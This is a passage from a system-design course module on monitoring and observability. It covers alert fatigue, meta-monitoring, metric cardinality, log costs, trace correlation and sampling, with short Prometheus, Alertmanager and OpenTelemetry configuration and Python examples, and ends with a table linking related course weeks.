    Note right of OS: span_id: s2 (parent: s1)<br/>Log: "Processing order"<br/>Metric: order_count++

    OS->>PS: POST /internal/payments
    activate PS
    Note right of PS: span_id: s3 (parent: s2)<br/>Log: "Processing payment"

    PS->>DB: INSERT payment
    activate DB
    Note right of DB: span_id: s4 (parent: s3)<br/>Metric: db_query_duration

    DB-->>PS: OK
    deactivate DB

    PS-->>OS: Payment confirmed
    deactivate PS

    OS-->>GW: Order created
    deactivate OS

    GW-->>U: 201 Created
    deactivate GW

    Note over P: Scrapes /metrics every 15s<br/>Records: latency, QPS, errors
    Note over L: Receives structured logs<br/>Indexes in Elasticsearch
    Note over J: Receives trace spans<br/>Builds trace waterfall view

8. Aha Moments & Pitfalls

Aha Moment #1: Alert Fatigue Kills Monitoring

If an on-call engineer receives 100 alerts a day, after two weeks they will ignore all of them, including the genuinely critical ones. This is alert fatigue, and it has contributed to serious real-world outages (both AWS and Google have documented cases).

Solution: every alert must be actionable. If an alert fires and the engineer has nothing to do, delete that alert. Target: fewer than 5 pages per week per on-call rotation. One way to enforce this is to route by severity so that only critical alerts page a human; a sketch follows.
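
A minimal severity-based routing sketch, assuming the pagerduty-oncall receiver from section 5.5 and a hypothetical slack-alerts receiver:

alertmanager.yml (routing excerpt):

route:
  receiver: slack-alerts               # default: notify, never page
  group_by: ["alertname", "service"]
  routes:
    - matchers: ['severity="critical"']
      receiver: pagerduty-oncall       # only critical alerts wake someone up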

Aha Moment #2: Monitoring the Monitoring

What happens when Prometheus dies? No alert fires at all, because Prometheus is the very system that sends the alerts. This is the meta-monitoring problem.

Solutions (a heartbeat-rule sketch follows this list):

  • Use a deadman's switch: Prometheus sends a heartbeat alert every minute. If PagerDuty receives no heartbeat for 5 minutes, it raises a "Prometheus is down" incident
  • Run 2 Prometheus instances that cross-monitor each other
  • Use managed monitoring (Datadog, Grafana Cloud) as a backup for self-hosted Prometheus
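
A minimal sketch of the heartbeat rule (the kube-prometheus stack ships the same pattern under the name Watchdog); the dead-man's-switch check on the PagerDuty side is configured separately:

prometheus/alert-rules.yml (excerpt):

groups:
  - name: meta
    rules:
      - alert: Watchdog
        expr: vector(1)   # always true, so this alert fires continuously
        labels:
          severity: none
        annotations:
          summary: "Heartbeat: if this alert stops arriving, the alerting pipeline itself is broken"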

Aha Moment #3: Cardinality Explosion, the Silent Killer

A developer adds user_id as a metric label → 10M users = 10M time series. Prometheus OOM-crashes at 3AM. No alert fires (because Prometheus is dead; see Aha #2).

Prevention (a relabeling sketch follows this list):

  • Code review for every metric change
  • Alert when prometheus_tsdb_head_series exceeds a threshold
  • Enforce a label whitelist in the Prometheus relabeling config
  • Use recording rules to pre-aggregate high-cardinality metrics
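
A minimal relabeling sketch that strips the offending label before ingestion (job name and target are assumptions):

prometheus.yml (excerpt):

scrape_configs:
  - job_name: "payment-service"
    static_configs:
      - targets: ["payment-service:8082"]
    metric_relabel_configs:
      # Drop user_id from every scraped series to cap cardinality
      - action: labeldrop
        regex: user_id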

Aha Moment #4: Log Volume = Money

At 10K QPS and 5 log lines per request, that is 4.32B log lines/day ≈ 2.16TB raw/day. Elasticsearch storage for 90 days ≈ 64TB (assuming roughly 3x compression of the ~194TB raw). On AWS, 64TB of EBS gp3 costs ~$5,120/month for storage ALONE (not counting compute for the ES nodes).

Practical solutions (a sampling sketch follows this list):

  • Log levels: production default = WARN. Only enable DEBUG for a specific service while troubleshooting
  • Sampling: log 10% of successful requests, 100% of errors
  • Tiered storage: Hot (SSD, 7 days) → Warm (HDD, 30 days) → Cold (S3, 1 year) → Delete
  • Loki instead of Elasticsearch: index only labels, not full text → roughly 10x cheaper storage
  • Log aggregation: instead of logging every request, aggregate into metrics (rate, error count, latency percentiles)
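
A minimal sampling sketch in Python matching that policy (the function and SUCCESS_SAMPLE_RATE are illustrative, not part of section 6.1):

import logging
import random

logger = logging.getLogger("payment-service")
SUCCESS_SAMPLE_RATE = 0.10  # keep 10% of success logs, 100% of errors

def log_request(status_code: int, fields: dict) -> None:
    """Log every server error; sample successful requests to cut volume ~10x."""
    if status_code >= 500:
        logger.error("Request failed", extra={"extra_fields": fields})
    elif random.random() < SUCCESS_SAMPLE_RATE:
        logger.info("Request completed", extra={"extra_fields": fields})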

Pitfall #1: Forgetting to correlate the 3 pillars

Metrics show latency rising. Logs show "timeout error". But you cannot tell how they relate, because there is no shared trace_id connecting metrics → logs → traces.

Fix: exemplars (Prometheus + Grafana Tempo). From a metrics chart, click a data point → jump straight to the trace; from the trace, click a span → jump to the logs. All keyed by trace_id. A sketch of attaching an exemplar follows.
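
A minimal sketch of attaching the current trace_id as an exemplar with prometheus_client (exemplars require the OpenMetrics exposition format, and Prometheus must run with --enable-feature=exemplar-storage; REQUEST_DURATION is the histogram from section 6.1):

from opentelemetry import trace

duration = 0.123  # measured request duration in seconds (placeholder)
ctx = trace.get_current_span().get_span_context()
REQUEST_DURATION.labels(method="POST", path="/api/v1/payments").observe(
    duration,
    # Grafana uses this exemplar to deep-link the data point to its trace
    exemplar={"trace_id": format(ctx.trace_id, "032x")},
)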

Pitfall #2: Dashboards with too many panels

A 50-panel dashboard is a dashboard nobody reads. Like the aircraft cockpit: the pilot watches 6 primary instruments, not 500.

Fix: at most 10-12 panels per dashboard. Organize as a hierarchy: Overview → Service → Instance, with drill-down links between dashboards.

Pitfall #3: Alerting on causes instead of symptoms

Wrong: alert when CPU > 80%. CPU can be high because a batch job is running on schedule, which is completely normal.

Right: alert when P99 latency exceeds the SLO threshold. If CPU is at 90% but latency is still under 200ms, nobody needs to be paged.

Pitfall #4: No runbook

An alert fires at 3AM. The on-call engineer joined the team 2 weeks ago. The alert message: "HighErrorRate". No runbook link. The engineer loses 45 minutes reconstructing context before starting the fix.

Fix: every alert MUST have a runbook_url annotation. The runbook contains: (1) what the alert means, (2) impact, (3) steps to investigate, (4) common fixes, (5) escalation path.

Pitfall #5: Pre-aggregated metrics for detailed debugging

P99 latency rises → you cannot tell which user, which request, or which deploy caused it. Pre-aggregation threw the detail away.

Fix: for the debugging path, use high-cardinality structured events (OpenTelemetry traces with rich attributes, or Honeycomb-style wide events). See section 2.11. Metrics for dashboards, events for drill-down. A wide-event sketch follows.
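
A minimal wide-event sketch: one span per request carrying many high-cardinality attributes (the function and attribute names are illustrative):

from opentelemetry import trace

tracer = trace.get_tracer("payment-service")

def handle_checkout(user_id: str, request_id: str, item_count: int) -> None:
    with tracer.start_as_current_span("handle_checkout") as span:
        # High-cardinality values are fine on traces (unlike metric labels)
        span.set_attribute("user.id", user_id)
        span.set_attribute("request.id", request_id)
        span.set_attribute("deploy.version", "v2.1.0")
        span.set_attribute("cart.items", item_count)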

Pitfall #6: Instrumenting application code for every metric

Adding an OpenTelemetry SDK costs roughly 5% performance overhead, requires language-specific libraries, and misses kernel-level issues (TCP retransmits, syscall delays).

Fix: use eBPF observability (Pixie, Cilium Hubble, Parca) for infrastructure/network. Keep the application SDK for business logic only. See section 2.12.

Pitfall #7: Sampling 100% of traces in production

Trace data grows fast → 1TB/day → the cost quickly outruns the value.

Fix: tail-based sampling: keep 100% of errors + 100% of slow requests + 1% of normal traffic. Use the OpenTelemetry Collector tail_sampling processor (section 5.3) or Datadog Live Search.


9. Related Topics

| Topic | Link | Relationship |
|---|---|---|
| Estimation | Tuan-02-Back-of-the-envelope | Use estimation to size alert thresholds and storage for the monitoring stack |
| Networking | Tuan-03-Networking-DNS-CDN | Monitor DNS resolution time, CDN cache hit rate, network latency |
| API Design | Tuan-04-API-Design-REST-gRPC | Instrument API endpoints with RED metrics, structured logging per endpoint |
| Load Balancer | Tuan-05-Load-Balancer | Monitor LB health, connection distribution, backend health checks |
| Cache | Tuan-06-Cache-Strategy | Monitor cache hit rate, eviction rate, memory usage → critical SLI |
| Database | Tuan-07-Database-Sharding-Replication | Monitor replication lag, query latency, connection pool saturation |
| Message Queue | Tuan-08-Message-Queue | Monitor consumer lag, queue depth, dead letter queue size |
| Rate Limiter | Tuan-09-Rate-Limiter | Security alerts for rate limit violations, DDoS detection |
| Consistent Hashing | Tuan-10-Consistent-Hashing | Monitor hash ring rebalancing, hotspot detection |
| Microservices | Tuan-11-Microservices-Pattern | Distributed tracing across services, service mesh observability |
| CI/CD | Tuan-12-CICD-Pipeline | Deploy frequency tracking, change failure rate (DORA metrics) |
| AuthN/AuthZ | Tuan-14-AuthN-AuthZ-Security | Monitor failed auth attempts, token expiration, permission denials |
| Data Security | Tuan-15-Data-Security-Encryption | Audit log monitoring, PII detection, encryption key rotation alerts |
| URL Shortener | Tuan-16-Design-URL-Shortener | Case study: monitor redirect latency, cache hit rate, storage growth |
| Chat System | Tuan-17-Design-Chat-System | Case study: monitor WebSocket connections, message delivery latency |
| Notification | Tuan-19-Design-Notification-System | Case study: monitor delivery rate, push notification latency, failure rate |

Previous week: Tuan-12-CICD-Pipeline — CI/CD Pipeline · Next week: Tuan-14-AuthN-AuthZ-Security — Authentication & Authorization Security